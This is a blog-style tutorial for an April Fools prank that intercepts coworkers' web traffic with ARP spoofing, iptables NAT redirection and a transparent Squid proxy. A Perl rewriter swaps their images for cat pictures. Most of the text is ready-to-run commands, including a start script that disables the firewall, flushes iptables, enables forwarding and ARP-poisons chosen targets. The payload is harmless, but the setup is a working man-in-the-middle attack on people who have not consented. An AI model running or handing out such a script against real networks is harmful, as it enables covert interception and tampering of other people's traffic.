April Fools 2017 - MiTM and Cats what could go better together!

                                                                             

Aprils Fools 2017 is fast approaching.. let's have some fun.

For this years April fools joke I decided to have a little fun in the office, and do a little Man-In-the-Middle attack replacing all the images with Cats (since most of the code was already out there but outdated and not currently working.. I decided to give it a refresh)

Equipment needed:
  • Raspberry Pi or other Linux PC (I'm using Ubuntu 16.04 on a notebook)
  • SQUID Proxy (version 3.5.12).
  • IPTables for NAT/Redirect to the
  • arpspoof (version 2.4)
  • A sense of Humour

Installation:

install the required software

    sudo apt-get update
    sudo apt-get -y install iptables
    sudo apt-get -y install squid   (Use squid3 for raspbian)
    sudo apt-get -y install dsniff
Configure squid

Note if you have installed squid3 vs squid, you will need to substitute squid3 in various places (config files, log files, systemctl commands etc)

  sudo cp /etc/squid/squid.conf /etc/squid/squid_orig.conf
  sudo vi /etc/squid/squid.conf

contents of /etc/squid/squid.conf: version 3.5.X

url_rewrite_program /usr/local/bin/cats.pl
acl to_localhost dst 127.0.0.0/8 0.0.0.0/32 ::1
acl localnet src 192.168.1.0/24 # RFC1918 possible internal network
acl SSL_ports port 443
acl Safe_ports port 80 # http
acl Safe_ports port 21 # ftp
acl Safe_ports port 443 # https
acl Safe_ports port 70 # gopher
acl Safe_ports port 210 # wais
acl Safe_ports port 1025-65535 # unregistered ports
acl Safe_ports port 280 # http-mgmt
acl Safe_ports port 488 # gss-http
acl Safe_ports port 591 # filemaker
acl Safe_ports port 777 # multiling http
acl CONNECT method CONNECT
http_access deny !Safe_ports
http_access deny CONNECT !SSL_ports
http_access allow localhost manager
http_access deny manager
http_access allow localhost
http_access allow localnet
http_access deny all
http_port 3128 transparent
refresh_pattern ^ftp: 1440 20% 10080
refresh_pattern ^gopher: 1440 0% 1440
refresh_pattern -i (/cgi-bin/|\?) 0 0% 0
refresh_pattern (Release|Packages(.gz)*)$ 0 20% 2880
refresh_pattern . 0 20% 4320

Note: Set the IP address of your local network

For Raspbian on Squid3 I had to use the following http_port lines

http_port 8080
http_port 3128 intercept
Cats Re-Writer

create your cats rewriter in /usr/local/bin/cats.pl

sudo vi /usr/local/bin/cats.pl
sudo chmod 755 /usr/local/bin/cats.pl

Contents of /usr/local/bin/cats.pl

#!/usr/bin/perl
$|=1;
$count = 0;
$pid = $$;

open (DEBUG, '>>/tmp/cats.log');
autoflush DEBUG 1;

print DEBUG "########################################################################\n";

while (<>) {
  my @inputs=split / /;
  chomp($inputs[0]);
  chomp $_;

  if ($inputs[0] =~ /.*media\.tumblr\.com\/tumblr_.*/i) {
  print DEBUG "Input NOSQUID: $url\n";
  print "\n";
  print DEBUG "Output NOSQUID: $_\n";
  }
  elsif ($inputs[0] =~ /(.*\.jpg)/i) {
  $url = $1;
  print DEBUG "Input: $url -> http://thecatapi.com/api/images/get?format=src&type=jpg&nosquid\n";
  print "http://thecatapi.com/api/images/get?format=src&type=jpg&nosquid\n";
  }
  elsif ($inputs[0] =~ /(.*\.gif)/i) {
  $url = $1;
  print DEBUG "Input: $url -> http://thecatapi.com/api/images/get?format=src&type=gif&nosquid\n";
  print "http://thecatapi.com/api/images/get?format=src&type=gif&nosquid\n";
  }
  elsif ($inputs[0] =~ /(.*\.png)/i) {
  $url = $1;
  print DEBUG "Input: $url -> http://thecatapi.com/api/images/get?format=src&type=png&nosquid\n";
  print "http://thecatapi.com/api/images/get?format=src&type=png&nosquid\n";
  }
  elsif ($inputs[0] =~ /(.*\.jpeg)/i) {
  $url = $1;
  print DEBUG "Input: $url -> http://thecatapi.com/api/images/get?format=src&type=jpeg&nosquid\n";
  print "http://thecatapi.com/api/images/get?format=src&type=jpeg&nosquid\n";
  }
  else {
  print "\n";
  }
  $count++;
}
close DEBUG;

Running Squid

systemctl restart squid

Check /var/log/squid/cache.log for any unexpected errors

Script the Attack

vi  start.sh
#!/bin/sh
#--optional if you are using UFW
echo "Disabling Firewall"
ufw disable
#--optional if you are using Apache
echo "Stopping Apache"
sudo systemctl stop apache2
echo "Enabling NAT"
echo 1 > /proc/sys/net/ipv4/ip_forward
echo "Flushing Firewall"
iptables -F
echo "Setting Proxy Intercept"
iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner proxy --dport 80 -j REDIRECT --to-port 3128

#arpspoof -i eth0 192.168.1.1   # arp the whole network according to the man pages, but I've never been able to get this to work for a whole network

echo "Starting Arp Spoofing"
arpspoof \
-t (YOUR TARGET) \
-t (YOUR TARGET) \
-i eth0 (YOUR GATEWAY IP)
#arpspoof will continue to run until control-c is pressed cancelling the spoofing
sleep 15
echo "Flushing Firewall"
iptables -F
echo "Disabling NAT"
echo 0 > /proc/sys/net/ipv4/ip_forward
echo "Enabling UFW"
ufw enable
sudo systemctl start apache2
# Note..  sometimes I have noticed a problem where it does not remove the NAT rule, and the machine needs to be rebooted..

Note: for Raspbian I had to use the following NAT rule

iptables -A PREROUTING -t nat -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 3128

Diagnosing problems

After going through several blogs on various ways to get this working there are slight nuances between ubuntu and raspbian , as well as NAT and Squid versions.. here are the steps I usually go through to resolve problems

1) Get the base SQUID proxy with defaults working (use proxy config in browser setup to test)
2) resolve ACL issues with Squid config
3) resolve "transparent" vs not issue with Squid  (Disable it for direct browser testing)  if you get an unexpected "Access Denied" try turning off transparent mode. you can also try "intercept" rather than "transparent"
4) enable and diag cats.pl
5) resolve NAT / redirect issues
6) test arp poisioning

Note: you usually have to enable/test the transparent/NAT/ARP all at the same time